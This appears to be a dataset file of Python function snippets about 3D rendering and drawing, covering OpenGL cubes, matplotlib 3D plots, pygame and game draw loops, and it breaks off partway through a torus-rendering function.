[ "def render_wireframe_3d(self, **kwds):\n wireframe = [];\n for l in self.lines:\n l_coords = self.coordinates_of(l)\n wireframe.append( line3d(l_coords, **kwds))\n for a in self.arrows:\n a_coords = self.coordinates_of(a)\n wireframe.append(arrow3d(a_coords[0], a_coords[1], **kwds))\n return sum(wireframe)", "def plot3d(self):\n plot_rupture_wire3d(self)", "def on_draw( self ):\r\n self.clear()\r\n self.setup_3D()\r\n print \"DEBUG:\" , \"There are\" , len( self.renderlist ) , \"items in 'self.renderlist'\"\r\n for obj in self.renderlist:\r\n obj.draw()", "def plot_surface_3D(self, length = 30, fps = 30, **kwargs):\n fig = utils.get_figure(scale = 3)\n ax = fig.add_subplot(111, projection = '3d')\n\n # surface_x = self.xi_1_mesh\n # surface_y = self.xi_2_mesh\n # surface_x, surface_y, surface_z = self.surface()\n xyz = self.surface()\n\n # surface_x, surface_y = np.meshgrid(surface_x, surface_y)\n\n # print(np.shape(surface_x))\n # print(np.shape(surface_y))\n # print(np.shape(surface_z))\n\n control_points_x = np.array([control_point[0] for control_point in self.control_net.values()])\n control_points_y = np.array([control_point[1] for control_point in self.control_net.values()])\n control_points_z = np.array([control_point[2] for control_point in self.control_net.values()])\n\n # x_min = min(np.min(surface_x), np.min(control_points_x))\n # x_max = max(np.max(surface_x), np.max(control_points_x))\n # x_range = np.abs(x_max - x_min)\n #\n # y_min = min(np.min(surface_y), np.min(control_points_y))\n # y_max = max(np.max(surface_y), np.max(control_points_y))\n # y_range = np.abs(y_max - y_min)\n #\n # z_min = min(np.min(surface_z), np.min(control_points_z))\n # z_max = max(np.max(surface_z), np.max(control_points_z))\n # z_range = np.abs(z_max - z_min)\n #\n # ax.set_xlim(x_min - 0.05 * x_range, x_max + 0.05 * x_range)\n # ax.set_ylim(y_min - 0.05 * y_range, y_max + 0.05 * y_range)\n # ax.set_zlim(z_min - 0.05 * z_range, z_max + 0.05 * z_range)\n\n ax.scatter(control_points_x, control_points_y, control_points_z, depthshade = False, **CONTROL_POLYGON_KWARGS)\n\n # print(np.max(surface_x), np.max(surface_y), np.max(surface_z))\n # print(np.min(surface_x), np.min(surface_y), np.min(surface_z))\n # print(surface_x)\n # print(surface_y)\n # print(surface_z)\n xyz = np.reshape(xyz, (-1, 3))\n print(xyz.shape)\n x, y, z = xyz[:, 0], xyz[:, 1], xyz[:, 2]\n ax.scatter(x, y, z)\n # ax.plot_trisurf(\n # x, y, z,\n # cmap = plt.get_cmap('viridis'),\n # linewidth = 0,\n # antialiased = True,\n # )\n # ax.plot_surface(surface_x, surface_y, surface_z, rstride = 1, cstride = 1)\n # ax.plot_trisurf(surface_x, surface_y, surface_z)\n # ax.plot_trisurf(surface_x, surface_y, surface_z, **CURVE_KWARGS)\n\n ax.axis('off')\n\n ax.view_init(elev = 45, azim = 0) # note that this resets ax.dist to 10, so we can't use it below\n ax.dist = 7.5 # default is 10, so zoom in a little because there's no axis to take up the rest of the space\n\n plt.show()\n utils.save_current_figure(**kwargs)\n\n ### ANIMATION ###\n\n frames = length * fps\n\n writer = anim.writers['ffmpeg'](fps = fps, bitrate = 2000) # don't need a very high bitrate\n\n def animate(frame):\n print(frame, frames, frame / frames)\n ax.azim = 360 * frame / frames # one full rotation\n return [] # must return the list of artists we modified (i.e., nothing, since all we did is rotate the view)\n\n ani = anim.FuncAnimation(fig, animate, frames = frames, blit = True)\n ani.save(f\"{os.path.join(kwargs['target_dir'], kwargs['name'])}.mp4\", writer = writer)\n\n plt.close()", "def draw(self, fig, ax):\n\n\t\tpoints = self.apply_transformations() \n\t\tax.scatter3D(points[:, 0], points[:, 1], points[:, 2])\n\n\t\t# cube polygons collection\n\t\tverts = [\n\t\t\t[points[0], points[1], points[2], points[3]],\n\t\t\t[points[4], points[5], points[6], points[7]], \n\t\t\t[points[0], points[1], points[5], points[4]], \n\t\t\t[points[2], points[3], points[7], points[6]], \n\t\t\t[points[1], points[2], points[6], points[5]],\n\t\t\t[points[4], points[7], points[3], points[0]]\n\t\t]\n\t\t\n\t\t# render polygons\n\t\tax.add_collection3d(Poly3DCollection(verts, \n\t\tfacecolors='blue', linewidths=1, edgecolors='b', alpha=0.3))", "def draw_3d(self, win, x):\r\n c = 200 / (1 + self.length * self.length * 0.00001) # cool trick to make the color darker in the distance\r\n color = (c, c, c)\r\n\r\n height = game_settings.TILE / (self.length / 600) # The original formula of this was:\r\n # visible_height = true_height / distance\r\n # since we're not in meters but in pixel, 600 is an arbitrary\r\n # number in order to make the formula working.\r\n y = game_settings.HEIGHT / 2 - height / 2\r\n pygame.draw.rect(win, color, (x, y, game_settings.RAY_WIDTH, height))", "def draw3d(self, zoom):\n # For \"disappearing\" animation\n # For all balls except white and black\n if ((self.number == 0 and self.visible == False) or (self.number == 8 and self.visible == False)) == False:\n\n # Set position of light source because it depends on the position of the ball\n light_position = [zoom * (self.x - 200.0), zoom * (self.y + 200.0), zoom * 200.0, 1.0]\n light_direction = [zoom * self.x, zoom * self.y, 0.0, 1.0]\n\n glLightfv(GL_LIGHT0, GL_POSITION, light_position)\n glLightfv(GL_LIGHT0, GL_SPOT_DIRECTION, light_direction)\n\n # Turn on textures\n glEnable(GL_TEXTURE_2D)\n glBindTexture(GL_TEXTURE_2D, self.texture)\n\n # Here we move, rotate and draw the ball\n glPushMatrix()\n glScalef(zoom, zoom, zoom)\n glTranslatef(self.x, self.y, 0.0)\n glMultMatrixd(self.matrix)\n if self.radius > 1.0:\n graphicsBall3D(self.radius)\n glPopMatrix()\n\n # Turn off textures\n glDisable(GL_TEXTURE_2D)", "def setup_3D( self ):\r\n # ~ Modes and Flags ~\r\n # Use 'GL_DEPTH_TEST' to ensure that OpenGL maintains a sensible drawing order for polygons no matter the viewing angle\r\n glEnable( GL_DEPTH_TEST ) # Do these setup functions really have to be run every single frame? # TODO: Try moving these to the '__init__' , see what happens\r\n # glEnable( GL_CULL_FACE ) # Uncomment to preform backface culling # This might erase arrowheads if they are away-facing!\r\n # ~ View Frustum Setup ~\r\n glMatrixMode( GL_PROJECTION )\r\n glLoadIdentity()\r\n gluPerspective( 70 , self.width / float( self.height ) , 0.1 , 200 )\r\n # ~ View Direction Setup ~\r\n glMatrixMode( GL_MODELVIEW )\r\n glLoadIdentity()\r\n gluLookAt( *self.camera )", "def drawCurve3D(xlist, ylist, zlist):\n dislin.curv3d(xlist,ylist,zlist,len(xlist))", "def drawCube( self ):\n glBegin(GL_QUADS);\n mTexture(0.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n mTexture(1.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n mTexture(0.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n mTexture(1.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n mTexture(0.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n mTexture(0.0, 0.0); glVertex3f(-1.0, 1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f( 1.0, 1.0, 1.0);\n mTexture(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n mTexture(1.0, 1.0); glVertex3f(-1.0, -1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f( 1.0, -1.0, -1.0);\n mTexture(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n mTexture(1.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n mTexture(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n mTexture(0.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n mTexture(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n mTexture(0.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n mTexture(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n mTexture(1.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n mTexture(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glEnd()", "def setBorder3D():\n dislin.box3d()", "def axis3D(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep):\n dislin.graf3d(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep)", "def targets(self):\n self.renderer.begin_rendering(\"targets\")\n for target in self.targets:\n self.renderer.draw_rect_3d(target, 10, 10, True, self.renderer.blue())\n self.renderer.end_rendering()", "def visualize_3d(grbdir,x, y, z, t, thetax, thetay, name):\n # Set ax.azim and ax.elev to ra, dec\n global runconf\n\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure()\n plt.suptitle(r\"Visualisation of {name} in 3d:$\\theta_x$={tx:0.1f},$\\theta_y$={ty:0.1f}\".format(name=name, tx=thetax, ty=thetay))\n # Z\n ax = plt.subplot(2, 2, 1, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = z.ra.deg\n ax.elev = z.dec.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from CZTI pointing (z)\")\n\n # Transient\n ax = plt.subplot(2, 2, 2, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = t.ra.deg\n ax.elev = t.dec.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from nominal \\n transient direction\")\n\n # X\n ax = plt.subplot(2, 2, 3, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = x.ra.deg\n ax.elev = x.dec.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from CZTI X axis\")\n\n # Z\n ax = plt.subplot(2, 2, 4, projection='3d')\n plot_xyzt(grbdir,ax, x, y, z, t)\n ax.azim = y.ra.deg\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_zticklabels([])\n add_satellite(ax, x, y, z)\n ax.set_title(\"View from CZTI Y axis\")\n\n return", "def draw():\n global trackball, flashlight, \\\n vertex_buffer, normal_buffer, \\\n colors, color_buffer, selected_face, add_face, \\\n shaders\n\n # Clear the rendering information.\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n # Clear the transformation stack.\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n glPushMatrix()\n\n # Transform the objects drawn below by a rotation.\n trackball.glRotate()\n\n # * * * * * * * * * * * * * * * *\n # Draw all the triangular facets.\n glUseProgram(shaders)\n\n h_vertex = glGetAttribLocation(shaders,'vertex')\n h_normal = glGetAttribLocation(shaders,'normal')\n h_color = glGetAttribLocation(shaders,'color')\n h_eye = glGetUniformLocation(shaders,'eye')\n h_light = glGetUniformLocation(shaders,'light')\n\n # all the vertex positions\n glEnableVertexAttribArray(h_vertex)\n glBindBuffer (GL_ARRAY_BUFFER, vertex_buffer)\n glVertexAttribPointer(h_vertex, 3, GL_FLOAT, GL_FALSE, 0, None)\n \n # all the vertex normals\n glEnableVertexAttribArray(h_normal)\n glBindBuffer (GL_ARRAY_BUFFER, normal_buffer)\n glVertexAttribPointer(h_normal, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n # all the face vertex colors\n glEnableVertexAttribArray(h_color)\n glBindBuffer (GL_ARRAY_BUFFER, color_buffer)\n\n if selected_face and add_face:\n # paint that face's vertices Green\n rgb_selected = [0.7,0.9,0.6] #GREEN\n for change in range(9):\n colors[selected_face.id * 9 + change] = rgb_selected[change % 3]\n # update the color buffer\n glBufferData (GL_ARRAY_BUFFER, len(colors)*4, \n (c_float*len(colors))(*colors), GL_STATIC_DRAW)\n add_face = False\n\n glVertexAttribPointer(h_color, 3, GL_FLOAT, GL_FALSE, 0, None)\n \n # position of the flashlight\n light = flashlight.rotate(vector(0.0,0.0,1.0));\n glUniform3fv(h_light, 1, (2.0*radius*light).components())\n\n # position of the viewer's eye\n eye = trackball.recip().rotate(vector(0.0,0.0,1.0))\n glUniform3fv(h_eye, 1, eye.components())\n\n glDrawArrays (GL_TRIANGLES, 0, len(face.instances) * 3)\n\n glDisableVertexAttribArray(h_vertex)\n glDisableVertexAttribArray(h_normal)\n glDisableVertexAttribArray(h_color)\n\n glPopMatrix()\n\n # Render the scene.\n glFlush()\n\n glutSwapBuffers()", "def draw_flower_bed():\n turtle.up()\n turtle.left(180)\n turtle.forward(200)\n turtle.right(180)\n turtle.down()\n for x in range(3):\n draw_flower_advanced()", "def drawBoundingBoxes(ax, x, y, z, w, l, h, r, col='b', linewidth=2):\n # Do this, because we have center point\n l = l / 2.0\n w = w / 2.0\n\n # Calculate corner locations with rotation\n x1 = x + (w * math.cos(r) + l * math.sin(r))\n y1 = y + (-w * math.sin(r) + l * math.cos(r))\n x2 = x + (-w * math.cos(r) + l * math.sin(r))\n y2 = y + (+w * math.sin(r) + l * math.cos(r))\n x3 = x + (-w * math.cos(r) - l * math.sin(r))\n y3 = y + (w * math.sin(r) - l * math.cos(r))\n x4 = x + (w * math.cos(r) - l * math.sin(r))\n y4 = y + (-w * math.sin(r) - l * math.cos(r))\n\n # Bottom rectangle\n ax.plot3D([x3, x4], [y3, y4], [z, z], col, linewidth=2, alpha=0.8)\n ax.plot3D([x2, x1], [y2, y1], [z, z], col, linewidth=2, alpha=0.8)\n ax.plot3D([x3, x2], [y3, y2], [z, z], col, linewidth=2, alpha=0.8)\n ax.plot3D([x4, x1], [y4, y1], [z, z], col, linewidth=2, alpha=0.8)\n\n # Top rectangle\n ax.plot3D([x3, x4], [y3, y4], [z+h, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x2, x1], [y2, y1], [z+h, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x3, x2], [y3, y2], [z+h, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x4, x1], [y4, y1], [z+h, z+h], col, linewidth=2, alpha=0.8)\n\n # Vertical lines\n ax.plot3D([x1, x1], [y1, y1], [z, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x2, x2], [y2, y2], [z, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x3, x3], [y3, y3], [z, z+h], col, linewidth=2, alpha=0.8)\n ax.plot3D([x4, x4], [y4, y4], [z, z+h], col, linewidth=2, alpha=0.8)", "def draw_layers(self):\n\t\tfor z in xrange(0,16):\n\t\t\t#create surface for this layer\n\t\t\tsrf = pygame.Surface((16,128))\n\t\t\tfor x in xrange(0,16):\n\t\t\t\tfor y in xrange(0,128):\n\t\t\t\t\tv = self.data[ self.xyz_to_offset( x,y,z) ]\n\t\t\t\t\tif v != 0:\n\t\t\t\t\t\tsrf.fill( BLOCKS.get(v, [0,0])[1], \t(x, 127 -y, 1, 1 ))\n\t\t\t#save layer to dict for this chunk\n\t\t\tself.layers[z] = srf", "def draw(self):\n self._view.clear()\n for h in range(len(self._bricks)):\n self._bricks[h].draw(self._view)\n \n self._paddle.draw(self._view)\n \n for w in self._FP_list:\n w.draw(self._view)\n \n # draw ball if not None\n if not self._ball is None:\n self._ball.draw(self._view)", "def visualize_in_3d(self,**kwargs):\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection='3d')\n\n points = np.vstack([\n c.to_matrix() for c in self.contours if c.inclusion\n ])\n points[:,:2] = points[:,:2] * self.scan.pixel_spacing\n\n # Center the points at the origin for \n # spherical coordinates conversion.\n points = points - points.mean(axis=0)\n\n # Triangulate the azimuth and zenith transformation.\n azimuth = np.arctan2(points[:,1],points[:,0])\n zenith = np.arccos(points[:,2] / np.linalg.norm(points,axis=1))\n azi_zen = np.c_[azimuth.flatten(),zenith.flatten()]\n triangles = Delaunay(azi_zen).simplices\n\n # Start the points at 0 on every axis.\n # This lets the axis ticks to be interpreted as length in mm.\n points = points - points.min(axis=0)\n\n ax.set_xlabel('length (mm)')\n ax.set_ylabel('length (mm)')\n ax.set_zlabel('length (mm)')\n\n # Plot the points.\n ax.plot_trisurf(points[:,0], points[:,1], points[:,2],\n triangles=triangles, **kwargs)\n plt.show()", "def draw_flower_bed():\n turtle.up()\n turtle.left(180)\n turtle.forward(200)\n turtle.right(180)\n turtle.down()\n for flower in range(3):\n draw_flower_advanced()", "def draw():", "def drawCube( self ):\n glBegin(GL_QUADS);\n glTexCoord2f(0.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f(-1.0, 1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f( 1.0, 1.0, 1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f(-1.0, -1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f( 1.0, -1.0, -1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f( 1.0, -1.0, -1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f( 1.0, 1.0, -1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f( 1.0, 1.0, 1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f( 1.0, -1.0, 1.0);\n glTexCoord2f(0.0, 0.0); glVertex3f(-1.0, -1.0, -1.0);\n glTexCoord2f(1.0, 0.0); glVertex3f(-1.0, -1.0, 1.0);\n glTexCoord2f(1.0, 1.0); glVertex3f(-1.0, 1.0, 1.0);\n glTexCoord2f(0.0, 1.0); glVertex3f(-1.0, 1.0, -1.0);\n glEnd()", "def draw( self ):\r\n print \"Drawing cuboid!\"\r\n glTranslated( *self.pos3D ) # This moves the origin of drawing , so that we can use the above coordinates at each draw location\r\n if self.rotnByOGL:\r\n glRotated( self.thetaDeg , *self.rotAxis )\r\n # glTranslated( 0 , 0 , 0 ) # This moves the origin of drawing , so that we can use the above coordinates at each draw location\r\n print \"DEBUG:\" , \"Translated to\" , 0 , 0 , 0\r\n glColor3ub( *self.color ) # Get the color according to the voxel type\r\n print \"DEBUG:\" , \"Set color to\" , self.color\r\n pyglet.graphics.draw_indexed( \r\n 8 , # --------------------- Number of seqential triplet in vertex list\r\n GL_QUADS , # -------------- Draw quadrilaterals\r\n self.indices , # ---------- Indices where the coordinates are stored\r\n ( 'v3f' , self.vertX ) # vertex list , OpenGL offers an optimized vertex list object , but this is not it\r\n ) # 'v3i' # This is for integers I suppose!\r\n \r\n glColor3ub( *self.colorLine )\r\n pyglet.gl.glLineWidth( 3 )\r\n pyglet.graphics.draw_indexed( \r\n 8 , # --------------------- Number of seqential triplet in vertex list\r\n GL_LINES , # -------------- Draw quadrilaterals\r\n self.linDices , # ---------- Indices where the coordinates are stored\r\n ( 'v3f' , self.vertX ) # vertex list , OpenGL offers an optimized vertex list object , but this is not it\r\n ) # 'v3i' # This is for integers I suppose!\r\n \r\n print \"DEBUG:\" , \"Indices\"\r\n print self.indices \r\n print \"DEBUG:\" , \"Vertices\"\r\n print self.vertices \r\n \"\"\" URL: http://pyglet.readthedocs.io/en/pyglet-1.2-maintenance/programming_guide/graphics.html#vertex-lists\r\n \r\n There is a significant overhead in using pyglet.graphics.draw and pyglet.graphics.draw_indexed due to pyglet \r\n interpreting and formatting the vertex data for the video device. Usually the data drawn in each frame (of an animation) \r\n is identical or very similar to the previous frame, so this overhead is unnecessarily repeated.\r\n \r\n A VertexList is a list of vertices and their attributes, stored in an efficient manner that’s suitable for direct \r\n upload to the video card. On newer video cards (supporting OpenGL 1.5 or later) the data is actually stored in video memory.\r\n \"\"\"\r\n if self.rotnByOGL:\r\n glRotated( -self.thetaDeg , *self.rotAxis )\r\n glTranslated( *np.multiply( self.pos3D , -1 ) ) # Reset the transform coordinates\r\n print \"DEBUG:\" , \"Translated to\" , 0 , 0 , 0\r\n print \"Done drawing!\"", "def draw(self, surface):\n for molecule in self.molecules:\n molecule.draw(surface)", "def plot_3d_object(object_):\n \n # Initialize renderer instance\n r = Renderer()\n\n # Add surfaces and goal regions to the renderer instance\n for surf in object_:\n r.add((object_[surf][0],'b',1))\n if len(object_[surf])>2:\n r.add((object_[surf][2],'r',1))\n r.add((gPoint(-15,-15,-15),'k',1))\n r.show()", "def __drawCube(self):\n self.cubePos = [[[(160, 160), (200, 160), (240, 160)],\n [(160, 200), (200, 200), (240, 200)],\n [(160, 240), (200, 240), (240, 240)]],\n [[(400, 160), (440, 160), (480, 160)],\n [(400, 200), (440, 200), (480, 200)],\n [(400, 240), (440, 240), (480, 240)]],\n [[(280, 160), (320, 160), (360, 160)],\n [(280, 200), (320, 200), (360, 200)],\n [(280, 240), (320, 240), (360, 240)]],\n [[(40, 160), (80, 160), (120, 160)],\n [(40, 200), (80, 200), (120, 200)],\n [(40, 240), (80, 240), (120, 240)]],\n [[(160, 40), (200, 40), (240, 40)],\n [(160, 80), (200, 80), (240, 80)],\n [(160, 120), (200, 120), (240, 120)]],\n [[(160, 280), (200, 280), (240, 280)],\n [(160, 320), (200, 320), (240, 320)],\n [(160, 360), (200, 360), (240, 360)]]]\n self.cubeColor = {1: 'green', 2: 'blue', 3: 'red', 4: 'orange',\\\n 5: 'white', 6: 'yellow'}\n for x in range(6):\n for y in range(3):\n for z in range(3):\n pos = self.cubePos[x][y][z]\n color = self.cubeColor[self.cube.cube[x][y][z]]\n self.cv.create_rectangle(pos[0], pos[1], pos[0]+40, pos[1]+40,\n fill=color, width='2')", "def render(self):\n self.axial.Render()\n self.coronal.Render()\n self.sagittal.Render()\n #self.isosurface.Render()\n #self.rwi_pcp.Render()", "def drawLine3D(x0,y0,z0,x1,y1,z1):\n dislin.strt3d(x0,y0,z0)\n dislin.conn3d(x1,y1,z1)", "def drawCube(self):\r\n glBegin(GL_QUADS);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(-1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(1.0, 1.0, 1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(-1.0, 1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(-1.0, -1.0, -1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(-1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(1.0, -1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(-1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(-1.0, 1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(1.0, 1.0, 1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(1.0, 1.0, -1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(-1.0, -1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(1.0, -1.0, -1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(-1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(1.0, -1.0, -1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(1.0, 1.0, 1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(1.0, -1.0, 1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(-1.0, -1.0, -1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(-1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(-1.0, 1.0, 1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(-1.0, 1.0, -1.0);\r\n glEnd()", "def draw_3dbox(bbox, ax):\n ax.scatter(xs=bbox[:,0], ys=bbox[:,1], zs=bbox[:,2], marker='o')\n ax.plot(bbox[[0,1,5,4,0],0], bbox[[0,1,5,4,0],1], bbox[[0,1,5,4,0],2]) # front\n ax.plot(bbox[[2,3,7,6,2],0], bbox[[2,3,7,6,2],1], bbox[[2,3,7,6,2],2]) # back\n ax.plot(bbox[[0,3],0], bbox[[0,3],1], bbox[[0,3],2])\n ax.plot(bbox[[1,2],0], bbox[[1,2],1], bbox[[1,2],2])\n ax.plot(bbox[[4,7],0], bbox[[4,7],1], bbox[[4,7],2])\n ax.plot(bbox[[5,6],0], bbox[[5,6],1], bbox[[5,6],2])", "def map_face(self):\n #Array Order: U0,D1,R2,L3,F4,B5,\n \n cube_list = []\n cube_list = self.cube.definition()\n \n for index, cubit in enumerate(self.faces['Up']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index]])\n for index, cubit in enumerate(self.faces['Ri']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+9]])\n for index, cubit in enumerate(self.faces['Ft']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+18]])\n for index, cubit in enumerate(self.faces['Dn']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+27]])\n for index, cubit in enumerate(self.faces['Le']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+36]])\n for index, cubit in enumerate(self.faces['Bk']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+45]])", "def draw(self, surface):\n for box in self.checkboxes:\n box.draw(surface)", "def on_draw(self):\r\n\r\n \r\n # clear the screen to begin drawing\r\n arcade.start_render()\r\n\r\n background = arcade.load_texture(\"gala.png\")\r\n arcade.draw_texture_rectangle(SCREEN_WIDTH/2, SCREEN_HEIGHT/2,SCREEN_WIDTH , SCREEN_HEIGHT, background) \r\n \r\n\r\n for asteriod in self.rocks:\r\n asteriod.draw()\r\n \r\n # for asteriod in self.rockss:\r\n # asteriod.draw()\r\n\r\n # for asteriod in self.rocksss:\r\n # asteriod.draw() \r\n \r\n for bullet in self.bullets:\r\n bullet.draw()\r\n \r\n \r\n self.ship.draw()\r\n \r\n \r\n # TODO: draw each object\r", "def draw(self, view):\n for r in self._aliens:\n for alien in r:\n if alien != None:\n alien.draw(view)\n if self._ship != None:\n self._ship.draw(view)\n self._dline.draw(view)\n for bolt in self._bolts:\n bolt.draw(view)", "def draw_cube(self, window):\n size = pygame.display.get_surface().get_size()\n width = (size[0]/4)\n\n window.fill((000,000,000))\n\n self.draw_face(\"U\", window, (0 + (width*1), 0 + (width*0)), width)\n self.draw_face(\"L\", window, (0 + (width*0), 0 + (width*1)), width)\n self.draw_face(\"F\", window, (0 + (width*1) * 1, 0 + (width*1)), width)\n self.draw_face(\"R\", window, (0 + (width*2), 0 + (width*1)), width)\n self.draw_face(\"B\", window, (0 + (width*3), 0 + (width*1)), width)\n self.draw_face(\"D\", window, (0 + (width*1), 0 + (width*2)), width)\n\n pygame.display.update()", "def draw(self):\n for obj in self.objects:\n obj.draw()", "def render_solid_3d(self, **kwds):\n return sum([ polygon3d(self.coordinates_of(f), **kwds) \n for f in self.polygons ])", "def drawBolts(self,view):\r\n for bolt in self.getBolts():\r\n bolt.draw(view)", "def render(self, scene):\n if self.degenerate:\n return\n # The number of subdivisions around the hoop's radial direction.\n if self.thickness:\n band_coverage = scene.pixel_coverage(self.pos, self.thickness)\n else:\n band_coverage = scene.pixel_coverage(self.pos, self.radius * 0.1)\n if band_coverage < 0:\n band_coverage = 1000\n bands = sqrt(band_coverage * 4.0)\n bands = clamp(4, bands, 40)\n # The number of subdivisions around the hoop's tangential direction.\n ring_coverage = scene.pixel_coverage(self.pos, self.radius)\n if ring_coverage < 0:\n ring_coverage = 1000\n rings = sqrt(ring_coverage * 4.0)\n rings = clamp(4, rings, 80)\n slices = int(rings)\n inner_slices = int(bands)\n radius = self.radius\n inner_radius = self.thickness\n\n # Create the vertex and normal arrays.\n vertices = []\n normals = []\n\n outer_angle_step = 2 * pi / (slices - 1)\n inner_angle_step = 2 * pi / (inner_slices - 1)\n outer_angle = 0.\n for i in range(slices):\n cos_outer_angle = cos(outer_angle)\n sin_outer_angle = sin(outer_angle)\n inner_angle = 0.\n for j in range(inner_slices):\n cos_inner_angle = cos(inner_angle)\n sin_inner_angle = sin(inner_angle)\n\n diameter = (radius + inner_radius * cos_inner_angle)\n vertex_x = diameter * cos_outer_angle\n vertex_y = diameter * sin_outer_angle\n vertex_z = inner_radius 